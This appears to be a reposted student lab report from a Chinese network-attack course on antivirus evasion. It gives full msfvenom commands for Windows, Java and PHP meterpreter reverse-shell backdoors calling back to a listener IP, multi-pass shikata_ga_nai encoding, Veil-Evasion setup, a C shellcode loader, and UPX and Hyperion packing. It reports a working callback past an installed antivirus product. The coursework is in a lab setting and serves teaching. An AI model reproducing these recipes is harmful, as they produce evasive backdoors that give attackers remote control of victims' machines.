2. 程式人生 > >2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐

2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐

阿新 發佈:2019-03-29
col eno 比較 encode var 針對 name -s cnblogs

2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐

    • 免殺原理及基礎問題回答
    • 實驗內容
      • 任務一:正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或技巧
        1. 使用msf編碼器生成各種後門程序及檢測
        2. 使用veil-evasion生成後門程序及檢測
        3. 半手工註入Shellcode並執行
      • 任務二:通過組合應用各種技術實現惡意代碼免殺
      • 任務三:用另一電腦實測,在殺軟開啟的情況下,可運行並回連成功,註明電腦的殺軟名稱與版本
    • 實驗遇到的問題及解決方法
    • 離實戰還缺什麽技術或步驟
    • 實驗總結及體會

免殺原理及基礎問題回答

一、免殺原理

  • 免殺就是通過一定的手段,將文件進行“整容”,讓殺軟無法識別,已達到免於被殺軟查殺的目的。
  • 免殺思路:(1)對病毒木馬文件進行修改;(2)拓展病毒木馬文件功能,甚至是攻擊殺軟來達到目的。

二、基礎問題回答

  • 問:殺軟是如何檢測出惡意代碼的?
    • 特征碼是指殺軟針對相應病毒或木馬所特有的特點截取的一段二進制代碼(涵蓋了十六進制代碼、匯編指令等)。殺軟就是依靠檢查文件特征碼來識別一個文件是不是病毒或木馬。
    • 啟發式惡意軟件檢測:啟發式指 “自我發現的能力”或“運用某種方式或方法去判定事物的知識和技能”, 是殺毒軟件能夠分析文件代碼的邏輯結構是否含有惡意程序特征,或者通過在一個虛擬的安全環境中前攝性的執行代碼來判斷其是否有惡意行為
    • 基於行為的惡意軟件檢測:通過對惡意代碼的觀察研究,發現有一些行為是惡意代碼共同的比較特殊的行為,殺軟會監視程序的運行,如果發現了這些特殊行為,就會認為其是惡意軟件。
  • 問:免殺是做什麽?
    • 使用一些技術手段對惡意軟件做處理,讓它不被殺毒軟件所檢測。
  • 問:免殺的基本方法有哪些?
    • 改變特征碼
      • 只有EXE——加殼
      • 有shellcode——利用encode進行編碼
      • 有源代碼——用其他語言進行重寫再編譯
        • veil-evasion
        • 半手工
    • 改變行為
      • 通訊方式
        • 盡量使用反彈式連接
        • 使用隧道技術
        • 加密通訊數據
      • 操作模式
        • 基於內存的操作
        • 減少對系統的修改
        • 加入混淆作用的正常功能代碼

三、免殺效果評價
利用VirusTotal或Virscan,可以上傳免殺處理過的程序進行檢測。

返回目錄

實驗內容

任務一:正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或技巧

1. 正確使用msf編碼器,生成exe文件

  • 在實驗二中使用msf生成了後門程序,使用VirusTotal或Virscan這兩個網站對生成的後門程序進行掃描。

  • 用VirusTotal掃描後結果如下:

技術分享圖片

  • Virscan網站的掃描結果如下:

技術分享圖片

下面我們用msf編碼器對後門程序進行一次到多次的編碼,並進行檢測

  • 一次編碼使用命令:-e選擇編碼器,-b是payload中需要去除的字符,該命令中為了使‘\x00‘不出現在shellcode中
  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b \x00 LHOST=192.168.1.155 LPORT=5311 -f exe > ljx-backdoor.exe

技術分享圖片

  • 進行十次編碼
  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.155 LPORT=5311 -f exe > ljx-backdoor10.exe
  • 將編碼十次後的可執行文件上傳到VirusTotal掃描後結果如下

技術分享圖片

  • 可見多次編碼對免殺沒有太大的效果,原因有兩點:
  1. 殺軟只要盯住shikata_ga_nai解碼(decoder stub)加入exe的部分。
  2. msfvenom會以固定的模板生成exe,所有它生成的exe,如果使用默認參數或模板,也有一定的固定特征。

2. msfvenom生成jar文件

  • 生成java後門程序使用命令:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.155 LPORT=5311 x> ljx_backdoor_java.jar

  • 生成文件如下所示:

技術分享圖片

  • 掃描結果如下:

技術分享圖片

3. msfvenom生成php文件

  • 生成PHP後門程序使用命令:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.155 LPORT=5311 x> ljx_backdoor.php

  • 生成文件如下所示:

技術分享圖片

  • 掃描結果如下:

技術分享圖片

返回目錄

4. 使用veil-evasion生成後門程序及檢測

安裝veil

  • 因為鏡像版本原因,在安裝之先執行下面的指令
mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
  • sudo apt-get install veil-evasion命令安裝Veil
  • 之後用veil打開veil,輸入y繼續安裝直至完成:

技術分享圖片

  • use evasion命令進入Evil-Evasion

技術分享圖片

  • 輸入命令use c/meterpreter/rev_tcp.py進入配置界面

技術分享圖片

  • 設置反彈連接IP,命令為:set LHOST 192.168.1.155,註意此處的IP是KaliIP;

  • 設置端口,命令為:set LPORT 5311

技術分享圖片

  • 輸入generate生成文件,接著輸入你想要playload的名字:veil_c_5311

技術分享圖片

  • 如上圖所示,保存路徑為/var/lib/veil/output/compiled/veil_c_5311.exe

  • 檢測一下:

技術分享圖片

返回目錄

5. 半手工註入Shellcode並執行

  • 首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.155 LPORT=5311 -f c用c語言生成一段shellcode;

技術分享圖片

  • 創建一個文件20165311.c,然後將unsigned char buf[]賦值到其中,代碼如下:
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此處省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}
  • 使用命令:i686-w64-mingw32-g++ 20165311.c -o 20165311.exe編譯這個.c文件為可執行文件;

技術分享圖片

  • 檢測結果如下圖:

技術分享圖片

  • 當想要使用windows上執行該程序時,被電腦的360衛士查殺。

技術分享圖片

返回目錄

任務二:通過組合應用各種技術實現惡意代碼免殺

  • 使用壓縮殼(UPX)
  • 給之前的20165318.exe加個殼得到sxx_upxed.exe:

技術分享圖片

  • 還是被殺軟查殺了

技術分享圖片

  • 加密殼Hyperion
  1. 將上一個生成的文件拷貝到/usr/share/windows-binaries/hyperion/目錄中
  2. 進入 /usr/share/windows-binaries/hyperion/
  3. 輸入命令wine hyperion.exe -v ljx_upxed.exe ljx_upxed_Hyperion.exe進行加殼:

技術分享圖片

技術分享圖片

  • 嘗試一下反彈連接

技術分享圖片

  • 網頁檢查一下

技術分享圖片

技術分享圖片

返回目錄

任務三:用另一電腦實測,在殺軟開啟的情況下,可運行並回連成功,註明電腦的殺軟名稱與版本

  • 免殺方法:先用msfvenom生成shellcode,再使用壓縮殼和加密殼進行加殼。

  • 實驗環境:對方電腦為 win7虛擬機,360安全衛士11.4.0.2003(由於我的kali問題,最後一個任務我與5329何佳偉用了同一個win7系統進行反彈連接)

  • 反彈連接結果、

技術分享圖片

返回目錄

離實戰還缺些什麽技術或步驟?

  • 由於病毒庫的更新速度非常的快,我們只有掌握更加成熟的技術來包裝病毒才能不被查殺到。

  • 對於實戰來說,我還需要學習更多對病毒的改造方法。

返回目錄

實驗遇到的問題及解決方法

在安裝veil evasion的時候展開包一直失敗,後來上網百度了以後才知道這個和版本有關系

輸入以下代碼之後問題就順利解決了

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

返回目錄

實踐總結與體會

首先那個veil太難裝了總出錯,一開始裝了一個晚上最後還是失敗了,這次實驗學到了很多知識。

最重要也是最有趣的就是如何把後門軟件進行改造來讓它偽裝騙過所有的殺毒軟件,而且實驗中

也讓我們也見識到了中國殺毒軟件的“菜”,學習永無止境!

返回目錄

2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐

相關推薦

2018-2019-2 對抗技術 20165311 Exp3 原理實踐

col eno 比較 encode var 針對 name -s cnblogs 2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐 免殺原理及基礎問題回答 實驗內容 任務一:正確使用msf編碼器,msfvenom生成如j

2018-2019-2 對抗技術 20165334 Exp3 原理實踐

語言 保護 r文件 原理 添加 ima port 復制 png 2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐 一、實驗內容 任務一正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,利用shellc

2018-2019-2 對抗技術 20165210 Exp3 原理實踐

問題 網站 丟失 其他 圖片 https 壓縮包 exe 生成 2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐 免殺的概述 免殺,也就是反病毒(AntiVirus)與反間諜(AntiSpyware)的對立面,英文為Anti-AntiViru

2018-2019-2 對抗技術 20165326 Exp3 原理實踐

log ant tool 能夠 校驗和 nco bin .html 錯誤代碼 免殺原理與實踐 目錄 知識點問答 實踐內容 遇到的問題 心得體會 知識點 meterpreter免殺 基礎問題回答 殺軟是如何檢測出惡意代碼的? 特征碼(基於簽名):模式匹配,比對特

20165214 2018-2019-2對抗技術Exp3 原理實踐 Week5

實現 進行 中間 信息 失敗 中一 網絡安全 需要 識別 《網絡對抗技術》Exp3 免殺原理與實踐 Week5 一、實驗內容 1、正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程; 2、通過組

2017-2018-4 20155317《對抗技術EXP3 原理實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

20164317《對抗技術Exp3 原理實踐

實驗中遇到的問題 不同的 靜默安裝 組合 alt ping 程序 upx 上一個 一、實驗要求 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellco

20155220 攻防技術 實驗三 原理實踐

基於 back 網絡攻防 lis 方法 由於 原理 使用 生成可執行文件 網絡攻防技術 實驗三 免殺原理與實踐 使用msf生成後門程序的檢測 首先我們對上次實驗生成的後門exe,利用VirSCAN進行檢測 然後我們利用msfvenom -p java/meterp

2018-2019-2 對抗技術 20165230 Exp2 後門原理實踐

ping 反向連接 後門 操作 netcat 方式 拍照 art 基本 目錄 1.實驗內容 2.基礎問題回答 3.常用後門工具實踐 3.1netcat 3.

2018-2019-2 對抗技術 20165231 Exp2 後門原理實踐

class 一個 打開 功能 目標 rontab head 定時任務 con 實驗內容 1.使用netcat獲取主機操作Shell,cron啟動 2.使用socat獲取主機操作Shell, 任務計劃啟動 3.使用MSF meterpreter(或其他軟件)生成可執

2018-2019-2 對抗技術 20165303 Exp4 惡意代碼分析

直觀 註冊表 amp 能力 網絡連接 XML image strac 不成功 實踐目標 1.1是監控你自己系統的運行狀態,看有沒有可疑的程序在運行。 1.2是分析一個惡意軟件,就分析Exp2或Exp3中生成後門軟件;分析工具盡量使用原生指令或sysinternals,sys

2018-2019-2 對抗技術 20165206 Exp4 惡意代碼分析

利用 cep 不能 圖片 png 數字 sta 屬性 指導 - 2018-2019-2 網絡對抗技術 20165206 Exp4 惡意代碼分析 - 實驗任務 1系統運行監控(2分) (1)使用如計劃任務,每隔一分鐘記錄自己的電腦有哪些程序在聯網,連接的外部IP是哪裏。運行一

2018-2019-2 對抗技術 20165210 Exp4 惡意代碼分析

興趣 成了 詳細 使用 計時 hand 方式 不知道 退出 2018-2019-2 網絡對抗技術 20165210 Exp4 惡意代碼分析 一、實驗目標 首先是監控你自己系統的運行狀態,看有沒有可疑的程序在運行。 其次是分析一個惡意軟件,就分析Exp2或Exp3中生成後門

2018-2019-2 對抗技術 20165230 Exp5 MSF基礎應用

最大 網絡攻擊 如果 oca load search 返回 meta 字符串 目錄 1.實驗內容 2.基礎問題回答 3.實驗內容 任務一:一個主動攻擊實踐

2018-2019-2 對抗技術 20165225 Exp5 MSF基礎應用

code 敏感信息 解決 xpl num nco 體會 windows 安全 2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用 驗前準備 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一

2018-2019-2 對抗技術 20165322 Exp6 信息搜集漏洞掃描

獲得 應用 精確 add 搜索字符串 更改域名 windows 包含 doc 2018-2019-2 網絡對抗技術 20165322 Exp6 信息搜集與漏洞掃描 目錄 實驗內容與步驟 各種搜索技巧的應用 DNS IP註冊信息的查詢 基本的掃描技術 漏洞掃描 實驗過程中

2018-2019-2 對抗技術 20165219 Exp6 信息搜集漏洞掃描

開始 統一 打開文檔 服務 window tar site 目錄結構 狀態 2018-2019-2 網絡對抗技術 20165219 Exp6 信息搜集與漏洞掃描 實驗內容 各種搜索技巧的應用 DNS IP註冊信息的查詢 基本的掃描技術:主機發現、端口掃描、OS及服務版本探測

2018-2019-2 對抗技術 20165329 Exp7 欺詐防範

kit 實踐總結 由於 博客 sca 特定 訪問 etc 釣魚網站 2018-2019-2 網絡對抗技術 20165329 Exp7 網絡欺詐防範 1. 實踐內容(3.5分) 本實踐的目標理解常用網絡欺詐背後的原理,以提高防範意識,並提出具體防範方法。具體實踐有

2018-2019-2 對抗技術 20165337 Exp6 信息搜集漏洞掃描

tcp 鏡像服務 遠程 cat 修改 服務 目錄結構 filetype tracert 實踐內容 (1)各種搜索技巧的應用 (2)DNS IP註冊信息的查詢 (3)基本的掃描技術:主機發現、端口掃描、OS及服務版本探測、具體服務的查點(以自己主機為目標) (4)漏洞掃描:會

## 2018-2019-2 對抗技術 20165217 Exp6 信息搜集漏洞掃描

服務類 歐洲 -a 結束 rac res 搜索技巧 網站目錄 apt-get 2018-2019-2 網絡對抗技術 20165217 Exp6 信息搜集與漏洞掃描 實驗任務 (1)各種搜索技巧的應用 (2)DNS IP註冊信息的查詢 (3)基本的掃描技術:主機發現、端口掃描